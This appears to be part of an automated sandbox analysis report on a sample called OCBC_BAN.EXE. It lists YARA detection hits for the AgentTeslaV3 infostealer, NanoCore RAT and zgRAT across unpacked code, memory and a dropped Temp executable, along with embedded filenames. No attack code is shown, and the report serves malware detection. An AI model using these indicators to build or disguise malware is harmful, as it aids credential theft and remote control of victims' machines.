          Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.3.OCBC_BAN.EXE.985c050.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 0.3.OCBC_BAN.EXE.985c050.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
          Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPEDMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F41058
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F44BE9
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F410D0
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F4B410
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F40D40
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F40D30
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_00E3A318
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0303F3C8
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0303F080
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0693B788
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06935730
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_069384E0
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06930040
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0693847C
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06931200
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06931150
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06959BA8
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06957B60
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_069561C8
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06954168
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 12_2_0299E480
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 12_2_0299E471
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 12_2_0299BBD4
          Source: OCBC_BAN.EXEBinary or memory string: OriginalFilename vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 00000000.00000000.366564071.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 00000000.00000003.521290536.0000000009309000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCsupumbveaihwmgvdfi.dll" vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXEBinary or memory string: OriginalFilename vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000000.529126357.0000000000632000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.637423613.0000000005B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.634309710.0000000002A78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
